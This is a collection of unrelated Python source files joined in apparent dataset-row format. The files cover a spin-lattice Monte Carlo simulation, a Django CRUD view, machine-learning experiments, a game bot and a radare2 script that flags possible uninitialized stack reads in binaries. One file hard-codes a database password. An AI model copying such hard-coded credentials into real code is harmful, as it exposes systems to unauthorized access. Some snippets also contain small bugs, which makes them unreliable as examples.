    """One Metropolis sweep of the L x L Heisenberg-DM lattice at temperature T.

    Proposes small angle perturbations site by site, accepting via the
    Metropolis rule on the energy change (exchange J, DM term D,
    field B along z, plus the sin(theta) measure correction).
    Mutates s/theta/phi in place; returns [s, theta, phi, step, update].
    """
    J=1
    D=6**0.5
    B=[0,0,2] #acting along z-axis
    beta=1/T
    e=0.2#1
    update=0
    step=0
    # Proposed angles: small uniform perturbation of every site at once.
    theta2=(theta+e*(np.random.rand(L,L)-0.5))%(np.pi) #theta has to be in range (0,pi)
    phi2=phi+e*(np.random.rand(L,L)-0.5)
    s2=np.zeros((L,L,3))
    s2[:,:,0]=np.sin(theta2)*np.cos(phi2)
    s2[:,:,1]=np.sin(theta2)*np.sin(phi2)
    s2[:,:,2]=np.cos(theta2)
    y=np.array([0,1,0])
    x=np.array([1,0,0])
    for i in range(0,L):
        for j in range(0,L):
            if np.sin(theta2[i,j])<0.00001: continue #else there will be a problem in taking log of sin(theta2)
            si=s[i,j,:]
            # Periodic-boundary nearest neighbours in x and y.
            if i+1==L: sx=s[0,j,:]
            else: sx=s[i+1,j,:]
            if i-1==-1: sx_=s[L-1,j,:]
            else: sx_=s[i-1,j,:]
            if j+1==L: sy=s[i,0,:]
            else: sy=s[i,j+1,:]
            if j-1==-1: sy_=s[i,L-1,:]
            else: sy_=s[i,j-1,:]
            # Energy difference of flipping site (i, j) to its proposal; the
            # last term is the Jacobian (sin theta measure) correction.
            del_E=-J*np.dot(s2[i,j,:]-si,sx+sx_+sy+sy_) - np.dot(B,s2[i,j,:]-si) + D*np.dot(y,np.cross(s2[i,j,:]-si,sx-sx_)) - D*np.dot(x,np.cross(s2[i,j,:]-si,sy-sy_)) - T*(np.log(np.sin(theta2[i,j]))-np.log(np.sin(theta[i,j])))
            step+=1
            # Metropolis acceptance.
            if del_E<0 or np.exp(-beta*del_E)>random.random():
                update+=1
                theta[i,j]=theta2[i,j]
                phi[i,j]=phi2[i,j]
                s[i,j,:]=s2[i,j,:]
    return [s,theta,phi,step,update]
# Temperature sweep: 50k Metropolis sweeps per T, sampling chirality and
# magnetisation every 100 sweeps after a 25k-sweep burn-in (250 samples,
# hence the hard-coded /250 normalisation below).
for T in np.arange(0.1,5.1,0.2):
    t = time.time()
    theta=np.random.rand(L,L)
    phi=np.random.rand(L,L)
    chi=0 #Net Chirality
    X=[]
    mag=0 #Net Magnetisation
    for m in range(50001):
        [s,theta,phi,step,update]=monte(s,theta,phi,T)
        if m%100==0 and m>25000:
            # Persist the raw angle configuration plus the observables.
            a=np.reshape(theta,(1,L*L))
            b=np.reshape(phi,(1,L*L))
            c=np.append(a,b)
            np.savetxt(f,c,delimiter=',')
            X.append(chirality(theta,phi))
            mag+=magnet(theta)
        if m%1000==0: print(int(m/1000),end=' ')
    print("\n\n\n")
    print("Temperature : ",T)
    # NOTE(review): step/update come from the *last* sweep only, so this
    # is the final-sweep acceptance ratio, not the run average — confirm.
    print("Acceptance Ratio: ",update/step)
    print("Chirality: ",sum(X)/250)
    print("Magnetisation: ",mag/250)
    np.savetxt(g,X,delimiter=',')
    a=np.reshape(theta,(1,L*L))
    b=np.reshape(phi,(1,L*L))
    filename_a="theta"+str(T)+".txt"
    filename_b="phi"+str(T)+".txt"
    np.savetxt(filename_a,a)
    np.savetxt(filename_b,b)
    elapsed = time.time() - t
    print("Time elapsed for T = :",T," : ",elapsed)
print("\n\n\n") |
999,455 | c0a1365596ef027e6c169b132e426da03d84ef56 | """
날짜 : 2021/05/20
이름 : 김철학
내용 : 파이썬 데이터베이스 SQL 실습하기
"""
import pymysql
# Connect to the database.
# NOTE(review): credentials are hard-coded in source — move to config/env.
conn = pymysql.connect(host='192.168.10.114',
                       user='chhak2021',
                       password='1234',
                       db='chhak2021',
                       charset='utf8')
# Create the statement-execution cursor.
cur = conn.cursor()
# Run the query.
sql = "SELECT * FROM `USER1`;"
cur.execute(sql)
#conn.commit()
# Print each row (columns: id, name, phone, age).
for row in cur.fetchall():
    print('----------------')
    print('아이디 :', row[0])
    print('이름 :', row[1])
    print('휴대폰 :', row[2])
    print('나이 :', row[3])
    print('----------------')
# Close the connection.
conn.close()
print('Select 완료...')
|
999,456 | c9e53e2dfc659dd51e7f4cf4471a6b39c598ce6f | # -*- coding: utf-8 -*-
#by liangwenhao
# Problem 0019: write the contents of the numbers.xls file from problem 0016 into a numbers.xml file
def write_numbers_to_xml(list=None, to_path=None):
    """Serialize the given number list into an XML file at *to_path*.

    Produces <root><numbers> containing an XML comment plus the list
    rendered as JSON text. Returns None (and does nothing) when either
    argument is missing.

    NOTE(review): relies on module-level `etree` (presumably lxml.etree,
    since `pretty_print` is lxml-only) and `stringer`; neither import is
    visible in this file — confirm they exist upstream.
    NOTE(review): the parameter name `list` shadows the builtin; left
    unchanged because parameter names are part of the call interface.
    """
    if list is None or to_path is None:
        return None
    root_node = etree.Element('root')
    root_node.text = "\n\t"
    number_node = etree.SubElement(root_node, 'numbers')
    comment_node = etree.Comment("\n数字信息\n")
    comment_node.tail = "\n\t"
    number_node.append(comment_node)
    number_node.text = "\n\t" + stringer.list_to_json(list, "\t") + u'\n'
    number_node.tail = "\n"
    number_tree = etree.ElementTree(root_node)
    number_tree.write(to_path, pretty_print=True, xml_declaration=True, encoding='utf-8')
|
999,457 | df3d45bb0460b966197aa10e10fcd86a66f31f63 | from django.http import JsonResponse
from django.shortcuts import render
from .serializers import StudentSerializer
from .form import StudentForm
from .models import Student
from django.views import View
class CRUDOps(View):
    """Single class-based view providing list/create/update/delete for Student."""
    # def getmodal(self): #never used - just for future reference
    #     data = Student.objects.all()
    #     modal = ""
    #     for entry in data:
    #         modal += " <tr><td>" + entry.eno + "</td><td>" + entry.name + "</td><td>" + entry.branch + "</td><td>"
    #         modal += "<button class='editStudent' id='eStudent" + str(entry.id) + "' type='button'>Update</button>"
    #         modal += "<button class='deleteStudent' id='dStudent" + str(entry.id) + "' type='button'>Delete</button>"
    #         modal += "</td></tr>"
    #     return modal
    def get(self, request):
        """Render the index page with the form and all students."""
        # NOTE(review): binds request.POST during a GET; the usual Django
        # pattern is an unbound StudentForm() here — confirm intent.
        form = StudentForm(request.POST)
        studentdata = Student.objects.all()
        context = {'form': form, 'studentdata': studentdata}
        return render(request, 'index.html', context)
        # return JsonResponse(context)
    def post(self, request, sid=None):
        """Create a Student, or update the one with id *sid* when given."""
        form = StudentForm(request.POST)
        if sid is not None:
            # Rebind the form to the existing instance so save() updates it.
            student = Student.objects.get(id=sid)
            form = StudentForm(request.POST, instance=student)
        if form.is_valid():
            form.save()
        studentdata = Student.objects.all()
        context = {'form': form, 'studentdata': studentdata}
        return render(request, 'index.html', context)
    def put(self, request, sid):
        """Return the serialized Student *sid* (used to pre-fill the edit form)."""
        # NOTE(review): implicitly returns None when sid is None.
        if sid is not None:
            studentdata = Student.objects.get(id=sid)
            return JsonResponse(StudentSerializer(studentdata).data, safe=False)
    def delete(self, request, sid):
        """Delete Student *sid* and re-render the index page."""
        form = StudentForm(request.POST)
        student = Student.objects.get(id=sid)
        student.delete()
        studentdata = Student.objects.all()
        context = {'form': form, 'studentdata': studentdata}
        return render(request, 'index.html', context)
|
999,458 | 8a7ee4e3a972d13d2af989c80408a9049268c1cf | import setup_environment
import util.task
util.task.run()
|
999,459 | d4a640fc7676ec35b7ac408a1fbe0dd7385c54e0 | def sum_two_numbers(num1,num2):
sum=num1+num2
return sum
num1=input('enter first number')
num2=input('enter second number')
x=sum_two_numbers(num1,num2)
print("sum={0}".format(x))
|
999,460 | 983d9748416e318c99c2ca67c06053e87a4cadcd | def lengthOfLastWord(s):
if not s:
return 0
ss = s.split()
return len(ss[-1]) |
999,461 | faaf636c62eaec6d1c5e4700d75a70f3eabf7913 | #!/usr/bin/python
import r2pipe
from time import sleep
from colorama import Fore, Back
'''
import angr
import pydot
import io
r2 = r2pipe.open()
func_start = int( r2.cmd('?v $FB'), 16 )
func_end = int( r2.cmd('?v $FE'), 16 )
func_code = ''.join( map( lambda b: chr(b), r2.cmdj("pcj $FS") ) )
proj = angr.Project( io.BytesIO(func_code),
load_options={'auto_load_libs': False,
"main_opts": {
'backend': 'blob',
'custom_base_addr': func_start,
'custom_arch': 'x86'
}
}
)
state = proj.factory.entry_state(mode='symbolic', add_options={
#angr.options.CGC_ZERO_FILL_UNCONSTRAINED_MEMORY,
#angr.options.CONSTRAINT_TRACKING_IN_SOLVER,
#"SYMBOLIC_WRITE_ADDRESSES",
angr.options.SYMBOLIC_INITIAL_VALUES,
#angr.options.LAZY_SOLVES,
#angr.options.UNICORN,
#"BYPASS_UNSUPPORTED_SYSCALL",
"CALLLESS"
})
def on_exec(state):
print "[exec] 0x%x" % state.scratch.ins_addr
def on_memread(state):
eip = state.scratch.ins_addr
mem_read_addr = state.se.eval(state.inspect.mem_read_address)
mem_read_value = state.se.eval(state.inspect.mem_read_expr)
print "[read] 0x%x: *0x%x -> 0x%X" % ( eip, mem_read_addr, mem_read_value )
def on_memwrite(state):
eip = state.scratch.ins_addr
mem_write_addr = state.se.eval(state.inspect.mem_write_address)
mem_write_value = state.se.eval(state.inspect.mem_write_expr)
print "[write] 0x%x: *0x%x <- 0x%X" % ( eip, mem_write_addr, mem_write_value )
def on_regread(state):
reg = state.inspect.reg_read_expr
print "[read] %s" % reg
state.inspect.b('instruction', when=angr.BP_AFTER, action=on_exec)
#state.inspect.b('mem_read', when=angr.BP_AFTER, action=on_memread)
#state.inspect.b('mem_write', when=angr.BP_AFTER, action=on_memwrite)
#state.inspect.b('reg_read', when=angr.BP_AFTER, action=on_regread)
sym_data = state.solver.BVS('', 0x100)
state.memory.store(0x00178000, sym_data)
state.regs.esp = 0x00178000
state.regs.ebp = 0x00178000
state.regs.eip = func_start
sm = proj.factory.simgr(state, save_unconstrained=True) # SimulationManager
sm.use_technique(angr.exploration_techniques.DFS())
covered_basic_blocks = set()
def draw_cover(covered_basic_blocks):
graph = pydot.Dot(graph_type='graph')
for bb in r2.cmdj("afbj"):
fillcolor = ('green','black') if bb["addr"] in covered_basic_blocks else ('black','white')
graph.add_node( pydot.Node( hex( bb["addr"] ), style="filled", fillcolor=fillcolor[0], fontcolor=fillcolor[1] ) )
for bb in r2.cmdj("afbj"):
if bb.get("fail"):
graph.add_edge( pydot.Edge( hex( bb["addr"] ) , hex( bb["fail"] ) ) )
if bb.get("jump"):
graph.add_edge( pydot.Edge( hex( bb["addr"] ) , hex( bb["jump"] ) ) )
graph.write_png('bb.png')
def discover(sm):
alternative_paths = set()
while sm.active and not sm.unconstrained and not sm.active[0].addr in covered_basic_blocks:
try:
basic_block = sm.active[0].addr
#print "0x%x" % basic_block
proj.factory.block(basic_block).capstone.pp()
covered_basic_blocks.add(basic_block)
except:
pass
sm.step()
draw_cover(covered_basic_blocks)
alternative_paths.update( sm.stashes['deferred'] )
#print sm.stashes
for path in alternative_paths:
sm = proj.factory.simgr(path, save_unconstrained=True)
sm.use_technique(angr.exploration_techniques.DFS())
discover(sm)
discover(sm)
#import pdb; pdb.set_trace()
'''
def check_UMR_stack(r2):
    """Heuristic Uninitialized-Memory-Read scan of local stack variables.

    For every function known to radare2, parse afvR/afvW output into
    {var_name: [access addresses]} maps, then flag any non-argument local
    whose read's basic-block back-trace shares no block with any write to
    that variable (reads via `lea` are treated as address-taking, not UMR).
    """
    for function in r2.cmdj("aflj"):
        # afvR / afvW list each variable followed by comma-separated
        # read/write addresses; parse into name -> [addr, ...] dicts.
        vars_r = { var[0]:var[1].split(',') if len(var)>1 else [] for var in map( lambda s:s.split(' '), map( lambda s:s.strip(), r2.cmd("afvR @ %s" % function['offset']).split('\n') ) ) }
        vars_w = { var[0]:var[1].split(',') if len(var)>1 else [] for var in map( lambda s:s.split(' '), map( lambda s:s.strip(), r2.cmd("afvW @ %s" % function['offset']).split('\n') ) ) }
        r2.cmd("s %s" % function['offset'])
        for (var_r,reads) in vars_r.items():
            # Skip arguments and bp+ (caller-frame) variables.
            if var_r.find('arg') != -1:
                continue
            if r2.cmd("afvd %s" % var_r).find('bp+') != -1:
                continue
            print "\n[*] %s %s" % ( function['name'], var_r ),
            for read in reads:
                print read,
                try:
                    # Basic blocks containing writes vs the blocks on the
                    # path leading to this read.
                    bb_writes = set( map(lambda a:r2.cmdj("abj 0x%x"%a)[0]['addr'], map(lambda x:int(x,16), vars_w[var_r])))
                    bb_read_path = set(r2.cmdj("abtj %s 1" % read)[0])
                except:
                    print Fore.LIGHTBLACK_EX + "\n[!] %s error analyze %s in %s" % (function['name'], var_r, read) + Fore.RESET
                    continue
                if not bb_writes & bb_read_path:
                    if r2.cmdj("aoj @ %s" % read)[0]['mnemonic'] != 'lea':
                        print "\n" + Back.RED + Fore.BLACK + "[+] %s: UMR in %s %s" % (read, function['name'], var_r) + Back.RESET + Fore.RESET
                        break
r2 = r2pipe.open()
check_UMR_stack(r2) |
999,462 | 583affd51c5a42ea84cc9d629f0f5239dea41fb0 | import numpy as np
import pandas as pd
import matplotlib as mlp
import matplotlib.pyplot as plt
# https://github.com/JerryKurata/MachineLearningWithPython/
# Load the Pima diabetes dataset and run basic sanity checks.
diabetes_data = pd.read_csv(r'src/ML Algorithms/1.ml.pima-data.csv')
# ticket_data = pd.read_csv(r'D:\svnTicketDispatcher\Inex Ticket Dispatcher\data\Inex Remedy Ticket Dump - July to May19\working\1.Inex Ticket Data Merged - July18 to May19.csv')
diabetes_data.head()
print(diabetes_data.shape)
print(diabetes_data.isnull().values.any())
# checking correlation
def plot_corr(df, size = 11):
    '''Plot the feature-correlation matrix of *df* as a colour-coded grid.

    size sets both figure dimensions (inches). Blocks on plt.show().
    '''
    corr = df.corr()
    fig, ax = plt.subplots(figsize=(size, size))
    ax.matshow(corr) # color code based on the correlation
    plt.xticks(range(len(corr.columns)), corr.columns)
    plt.yticks(range(len(corr.columns)), corr.columns)
    plt.show()
print(diabetes_data.corr())
# plot_corr(ticket_data, len(ticket_data.columns))
# diabetes_data.corr()
# 'skin' is dropped (correlated with 'thickness'); map bool labels to 0/1.
del diabetes_data['skin']
diabetes_map = {True:1, False:0}
diabetes_data['diabetes'] = diabetes_data['diabetes'].map(diabetes_map)
print(diabetes_data.head())
num_true = len(diabetes_data.loc[diabetes_data['diabetes'] == True])
num_false = len(diabetes_data.loc[diabetes_data['diabetes']== False])
print(num_true, num_false)
print((num_true / (num_true + num_false)) * 100)
print((num_false / (num_true + num_false)) * 100)
#splitting data
# NOTE(review): sklearn.cross_validation was removed in modern sklearn;
# the current module is sklearn.model_selection.
from sklearn.cross_validation import train_test_split
feature_col_names = ['num_preg','glucose_conc','diastolic_bp','thickness','insulin','bmi','diab_pred','age',]
predicted_class_names = ['diabetes']
X = diabetes_data[feature_col_names]
print(X, type(X))
#values converts the df object in array
X = diabetes_data[feature_col_names].values
X
y = diabetes_data[predicted_class_names].values
print(X, type(X))
print(y, type(y))
X_train, X_test, y_train, y_test = train_test_split(X, y ,test_size=0.30, random_state=42)
print("Total % of training set {}".format((len(X_train)/len(diabetes_data.index)) * 100))
print("Total % of testing set {}".format((len(X_test)/len(diabetes_data.index)) * 100))
## post-split data preparation
diabetes_data.head() # thickness is 0
# Count implausible zero values per feature (0 is a missing-data marker here).
print("row missing values {}".format((len(diabetes_data.loc[diabetes_data['glucose_conc'] == 0]))))
print("row missing values {}".format((len(diabetes_data.loc[diabetes_data['diastolic_bp'] == 0]))))
print("row missing values {}".format((len(diabetes_data.loc[diabetes_data['thickness'] == 0]))))
print("row missing values {}".format((len(diabetes_data.loc[diabetes_data['insulin'] == 0]))))
print("row missing values {}".format((len(diabetes_data.loc[diabetes_data['bmi'] == 0]))))
print("row missing values {}".format((len(diabetes_data.loc[diabetes_data['diab_pred'] == 0]))))
print("row missing values {}".format((len(diabetes_data.loc[diabetes_data['age'] == 0]))))
# only insulin can be zero rest is not good data where value are zero
#what to do with missing data
# 1. ignore
# 2. replace with another values mean, median sd impute,
# replace value from expert
# 3. Drop observation
# using mean imputing
from sklearn.preprocessing import Imputer
fill_0 = Imputer(missing_values=0, strategy='mean', axis=0)
X_train = fill_0.fit_transform(X_train)
# NOTE(review): fit_transform on X_test re-fits the imputer on test data
# (data leakage); the conventional call here is fill_0.transform(X_test).
X_test = fill_0.fit_transform(X_test)
# training initial NB algorithm
from sklearn.naive_bayes import GaussianNB
nb_model = GaussianNB()
len(X_train)
X_train.shape
len(y_train)
y_train.shape
yt = y_train.ravel()
yt.shape
nb_model.fit(X_train, y_train.ravel())
# Scratch experiments exploring ravel/reshape semantics (not used below).
x = np.array([[1, 2, 3], [4, 5, 6]])
from pprint import pprint
pprint(x.shape)
pprint(x)
pprint(x.ravel())
pprint(x.ravel().shape)
pprint(x.ravel(order='F'))
pprint(x.ravel(order='K'))
pprint(x.ravel(order='A'))
a = np.arange(12).reshape(2,3,2)
a
a.shape
a_s = np.arange(12).reshape(2,3,2).swapaxes(1,2)
a_s
pprint(x.reshape(1, 2, 3))
new_a = x.reshape(1, 2, 3)
new_a_1 = new_a.reshape(-1)
new_a_1.reshape(-1)
pprint(x.ravel())
# Evaluate the Naive Bayes model on train and test splits.
from sklearn.metrics import accuracy_score
predicted_train = nb_model.predict(X_train)
accuracy_score(y_train,predicted_train) *100
predicted = nb_model.predict(X_test)
predicted
from sklearn import metrics
accuracy_score(y_test,predicted) *100
print(accuracy_score(y_test,predicted) *100)
# lets do imputing
print("confusion matrix")
print(metrics.confusion_matrix(y_test,predicted))
print(metrics.classification_report(y_test, predicted))
# try random forest model to improve accuracy
from sklearn.ensemble import RandomForestClassifier
rf_model = RandomForestClassifier(random_state=42)
rf_model.fit(X_train,y_train)
rf_predicted_train = rf_model.predict(X_train)
print(metrics.accuracy_score(y_train, rf_predicted_train))
# 98% accuraccy it is overfitting and will not work well on real world data
rf_predict_test = rf_model.predict(X_test)
print(metrics.accuracy_score(y_test, rf_predict_test))
# 70% accuracy, due to overfitting it works poortly on real world data
print(metrics.confusion_matrix(y_test, rf_predict_test))
print(metrics.classification_report(y_test, rf_predict_test))
# recall and precision more poor
# lets try logistics regression
from sklearn .linear_model import LogisticRegression
lr_model = LogisticRegression(C=0.7, random_state=42)
lr_model.fit(X_train, y_train.ravel())
lr_predicted_test = lr_model.predict(X_test)
print(metrics.accuracy_score(y_test, lr_predicted_test))
print(metrics.classification_report(y_test, lr_predicted_test))
# find values of c for recall improvement
# Grid sweep over the regularisation strength C, tracking the best recall.
C_start = 0.1
C_end = 5
C_inc =0.1
C_values , recall_scores =[], []
C_val = C_start
best_recall_score = 0
while (C_val < C_end):
    C_values.append(C_val)
    lr_model_loop =LogisticRegression(C=C_val,random_state=42)
    lr_model_loop.fit(X_train, y_train.ravel())
    lr_predicted_loop_test = lr_model_loop.predict(X_test)
    recall_score = metrics.recall_score(y_test,lr_predicted_loop_test)
    recall_scores.append(recall_score)
    if recall_score > best_recall_score:
        best_recall_score = recall_score
        best_lr_predict_test = lr_predicted_loop_test
    print(C_val, best_recall_score)
    C_val = C_val + C_inc
best_score_C_val = C_values[recall_scores.index(best_recall_score)]
print(best_recall_score, best_score_C_val)
import matplotlib.pyplot as plt
plt.plot(C_values,recall_scores)
plt.xlabel("C value")
plt.ylabel("recall score")
plt.show()
# still 61% may be due to imb alance in dataset
# 65% DIABETICS AND 35% non diabetic and is imbalance of classes
# enabeld wieght hyperparameter to handle unbalance
#balanced weight
# find values of c for recall improvement
# logistic regression with balanced weight to handle class unbalances
# Same C sweep as above, but with class_weight="balanced".
C_start = 0.1
C_end = 5
C_inc =0.1
C_values , recall_scores =[], []
C_val = C_start
best_recall_score = 0
while (C_val < C_end):
    C_values.append(C_val)
    lr_model_loop =LogisticRegression(class_weight ="balanced" ,C=C_val ,random_state=42)
    lr_model_loop.fit(X_train, y_train.ravel())
    lr_predicted_loop_test = lr_model_loop.predict(X_test)
    recall_score = metrics.recall_score(y_test,lr_predicted_loop_test)
    recall_scores.append(recall_score)
    if recall_score > best_recall_score:
        best_recall_score = recall_score
        best_lr_predict_test = lr_predicted_loop_test
    print(C_val, best_recall_score)
    C_val = C_val + C_inc
best_score_C_val = C_values[recall_scores.index(best_recall_score)]
print(best_recall_score, best_score_C_val)
import matplotlib.pyplot as plt
plt.plot(C_values,recall_scores)
plt.xlabel("C value")
plt.ylabel("recall score")
plt.show()
# lets try logistics regression
from sklearn .linear_model import LogisticRegression
# NOTE(review): C=best_recall_score passes the best *recall value* as the
# regularisation strength; best_score_C_val (the C that achieved it) looks
# like the intended argument — confirm.
lr_model = LogisticRegression(class_weight="balanced", C=best_recall_score, random_state=42)
lr_model.fit(X_train, y_train.ravel())
lr_predicted_test = lr_model.predict(X_test)
print(metrics.accuracy_score(y_test, lr_predicted_test))
print(metrics.classification_report(y_test, lr_predicted_test))
# use Cross validation
from sklearn .linear_model import LogisticRegressionCV
lr_model_cv = LogisticRegressionCV(n_jobs=1 ,Cs=3, cv=10 , refit=False, class_weight="balanced", random_state=42)
lr_model_cv.fit(X_train, y_train.ravel())
lr_predicted_cv_test = lr_model_cv.predict(X_test)
print(metrics.accuracy_score(y_test, lr_predicted_cv_test))
print(metrics.classification_report(y_test, lr_predicted_cv_test))
# n_jobs =1 use all the cores in pc
# cs = integer value tries to find best regularizatoin parameter
# CV = 10
|
999,463 | 0c5bb43c2668f2351cb142ce139881b56eefaa18 | """
url mapping for user app a part of OpenAl8az project.
By : Mahmoud Elshobaky (mahmoud.elshobaky@gmail.com).
"""
# import app engine frameworks
import webapp2
from webapp2_extras import routes
# import app settings
from settings import *
#import project modules and request handlers
from request_handlers import *
#URL Mapping
# ex. [webapp2.Route(_u+'/signup', SignUp, 'user-signup'),]
_u = URLS_PREFIX + '/user' # you can add prefix for app ex. -u = URLS_PREFIX + '/user'
# Route table for the user app: auth, profile management, and a regex
# route matching numeric user ids for public profiles.
urls = [
    webapp2.Route(_u+'/signup', SignUp, 'user-signup'),
    webapp2.Route(_u+'/login', LogIn, 'user-login'),
    webapp2.Route(_u+'/logout', LogOut, 'user-logout'),
    webapp2.Route(_u+'/profile', MyProfile, 'my-profile'),
    webapp2.Route(_u+'/profile/changeavatar', ChangeAvatar, 'change-avatar'),
    webapp2.Route(_u+'/profile/changecontact', ChangeContact, 'change-contact'),
    (_u+'/([0-9]+)', Profile),
]
# rendring urls
#app = webapp2.WSGIApplication(urls,
# config=INTERNATIONAL_CFG, debug=DEBUG)
|
999,464 | ec79794dfd314a8f450713e990570bfc619ffb04 | """Plugin based functionality."""
# =============================================================================
# >> IMPORTS
# =============================================================================
# Source.Python
from translations.strings import LangStrings
# Source.Python Admin
from .. import admin_core_logger
# =============================================================================
# >> ALL DECLARATION
# =============================================================================
__all__ = (
'admin_plugins_logger',
'plugin_strings',
)
# =============================================================================
# >> GLOBAL VARIABLES
# =============================================================================
# Child logger dedicated to plugin-related messages.
admin_plugins_logger = admin_core_logger.plugins
# Translation strings shared by all plugin UIs.
plugin_strings = LangStrings('_core/plugin_strings')
|
999,465 | f2654d062c7b19416f31252901ac7985fd0ae009 | import compileall
compileall.compile_dir("/app/", force=True,legacy=True) |
999,466 | 3ee819ef2ab833bb75dcf9b6d4349d97bd910348 | def doblar(n):
return n*2
def doblarla(n): return n*2
dobla = lambda num: num*2
print(dobla(3))
impar = lambda num: num%2 != 0
print(impar(5))
revertir = lambda cadena: cadena[::-1]
print(revertir("hola calahonda"))
sumar = lambda x,y: x+y
print(sumar(5,9)) |
999,467 | d8f41ae5f5fc7898d2c0ae8cbdcf117ce623ed91 | # -*- coding:utf-8 -*-
import numpy as np
import h5py
def load_cv(FOLD_FOR_TEST):
    """Load one cross-validation split from the HDF5 dataset.

    Samples whose FOLD equals FOLD_FOR_TEST become the validation set;
    everything else is training data. Labels are one-hot over 7 classes.
    Returns [TRAIN_X, TRAIN_Y, VAL_X, VAL_Y].
    """
    # X
    h5 = h5py.File('../DATA-CROP-RAW-IN-IS.mat', 'r')
    X = h5['X'][:]
    X = np.reshape(X, [X.shape[0], X.shape[1], X.shape[2], 1])# 1 channel
    # Y
    Y = h5['LBL'][:]
    Y = np.hstack(Y)
    Y = np.float32(np.eye(7)[Y])# Y -> onehot
    # train val
    FOLD = h5['FOLD'][:]
    FOLD = np.hstack(FOLD)
    TRAIN_X = X[FOLD!=FOLD_FOR_TEST]
    VAL_X = X[FOLD==FOLD_FOR_TEST]
    TRAIN_Y = Y[FOLD!=FOLD_FOR_TEST]
    VAL_Y = Y[FOLD==FOLD_FOR_TEST]
    # print shape
    print 'TRAIN_X.shape', TRAIN_X.shape
    print 'TRAIN_Y.shape', TRAIN_Y.shape
    print 'VAL_X.shape', VAL_X.shape
    print 'VAL_Y.shape', VAL_Y.shape
    return [TRAIN_X, TRAIN_Y, VAL_X, VAL_Y]
|
999,468 | 7b8361d2026c8c6c39565f8333cf7230e95c8bbb | #!/usr/bin/env python
from noos_seed import noos_seed_from_json
# Examples from specification_request_package_v2.0_20190208
# From file
#############
# Seed from JSON files on disk.
lon, lat, time = noos_seed_from_json('seed_example4.2.json', plot=True)
lon, lat, time = noos_seed_from_json('seed_example4.5.json', plot=True)
# From dict
#############
# Point release: 2500 particles within a 1000 m radius at one instant.
json_example4_1 = {
    'geometry': 'point',
    'lon': 2.159,
    'lat': 52.1,
    'radius': 1000,
    'number': 2500,
    'time': '2018-10-17T13:07:12z'
    }
lon, lat, time = noos_seed_from_json(json_example4_1, plot=True)
# Cone release: start/end position, radius and time are interpolated.
json_example_cone = {
    'geometry': 'point',
    'lon': [2.159, 2.3],
    'lat': [52.1, 52.12],
    'radius': [10, 200],
    'number': 2500,
    'time': ['2018-10-17T12:00:00z', '2018-10-17T18:00:00z']
    }
lon, lat, time = noos_seed_from_json(json_example_cone, plot=True)
|
999,469 | a4511170ea7b4f72243f2d852c38db888e5c6b7a | from .Nissan import Nissan
|
999,470 | a9f22100fbdcd1b9ceaeb1db2ce121334b58e045 | from PlayGame import *
from Agent import *
import multiprocessing
def writeStrategy(filename, dataname):
    """Append each (key -> strategy dict) entry of *dataname* to *filename*.

    Keys are 2-tuples; each output line has the form
    "(a,b): {action: value, action: value, }".

    FIX: the original opened the file and never closed it, leaking a file
    handle on every call; a context manager guarantees the close (and the
    flush) even if a write raises.
    """
    with open(filename, 'a') as f:
        for key in dataname.keys():
            f.write("(" + str(key[0]) + "," + str(key[1]) + ")" + ': {')
            for action in dataname[key].keys():
                f.write(str(action) + ": " + str(dataname[key][action]) + ", ")
            f.write("}")
            f.write("\n")
if __name__ == "__main__":
pool = multiprocessing.Pool(processes = 4)
agentActList = []
agent0List = [agent(agentId=0, startLocIndex=0) for x in range(4)]
agent1List = [agent(agentId=1, startLocIndex=2) for x in range(4)]
for i in range(4):
agentActList.append(pool.apply_async(runGame, (agent0List[i], agent1List[i])))
pool.close()
pool.join()
for res in agentActList:
print(res.get()[0])
writeStrategy("Agent0_Strategy.txt", res.get()[1])
writeStrategy("Agent1_Strategy.txt", res.get()[2])
|
999,471 | 67e070a591ee33e7f46a820af5de0dc939721b4e | from fastapi import FastAPI
from oxigraph_admin.api import middleware
from oxigraph_admin.api import api_v1
from oxigraph_admin import settings
tags_metadata = [
{
'name': 'Security',
'description': 'Manage security settings.'
},
{
'name': 'Users',
'description': 'Manage authentication and authorization for users.'
},
{
'name': 'SPARQL Protocol Service',
'description': 'Proxy endpoints to interface directly with Oxigraph Server, protected by the Security middleware.'
}
]
def create_app():
    """Build and return the configured Oxigraph Admin FastAPI application."""
    application = FastAPI(title='Oxigraph Admin API', openapi_tags=tags_metadata)
    # Mount the v1 routers under the versioned prefix, then wrap every
    # request in the security middleware.
    application.include_router(api_v1.api.api_router_v1, prefix=settings.API_V1_STR)
    application.add_middleware(middleware.SecurityMiddleware)
    return application
|
999,472 | 0cf91dd8006ddd610ef41cd86be6492f7bdc0bf4 | # pylint: disable=C0103, too-few-public-methods, locally-disabled, no-self-use, unused-argument
'''This module contains various misc helper functions'''
|
999,473 | 9cf55023786c67483ae32007393271136cf090ed | import hlt
from hlt import config, strategies, spawner, ships, tactics, pathfinding, entity, positionals, constants
import logging, time, os
from itertools import product
import pandas as pd
from scipy import signal
import numpy as np
# logging.info("Initializing:")
config.load_constants()
for param in hlt.control.dyno:
for timepoint in hlt.control.dyno[param]:
logging.info(f"0\t{param}\t{timepoint}\t{hlt.control.dyno[param][timepoint]}")
# logging.info("Creating target df:")
hlt.control.all_pos = list()
for x, y in product(range(hlt.control.game.game_map.height), range(hlt.control.game.game_map.height)):
hlt.control.all_pos.append([x, y, None])
hlt.control.is_target[positionals.Position(x, y)] = False
hlt.control.target_df = pd.DataFrame(hlt.control.all_pos, columns=['x', 'y', ''])
hlt.control.target_df = hlt.control.target_df.set_index(['x', 'y'], drop=True)
# logging.info("Filling in all scores:")
search_start_time = time.time()
hlt.control.target_df = hlt.control.target_df.apply(tactics.get_target_score, axis=1)
hlt.control.initial_halite = hlt.control.current_halite
# logging.info(f"{hlt.control.target_df.head()}")
# logging.info(f"Finished score calculations in {time.time() - search_start_time} seconds.")
# for (i, score) in hlt.control.target_df.iteritems():
# logging.info(f"\n@{i[0]},{i[1]},{score},raw\n")
myarr = hlt.control.target_df.unstack()
r = list(range(hlt.control.kernel_radius, 0, -1)) + [0] + list(range(1, hlt.control.kernel_radius))
kernel = [[hlt.control.target_scaling ** (i+j) for j in r] for i in r]
# logging.info(f"{myarr}")
grad = signal.convolve2d(myarr, kernel, boundary='symm', mode='same')
new_df = pd.DataFrame(grad).stack().reindex_like(hlt.control.target_df)
# logging.info(f"{new_df.unstack()}")
# logging.info(f"{new_df}")
hlt.control.target_df = new_df
# for (i, score) in hlt.control.target_df.iteritems():
# logging.info(f"\n@{i[0]},{i[1]},{score},conv\n")
# logging.info(f"{hlt.control.target_df}")
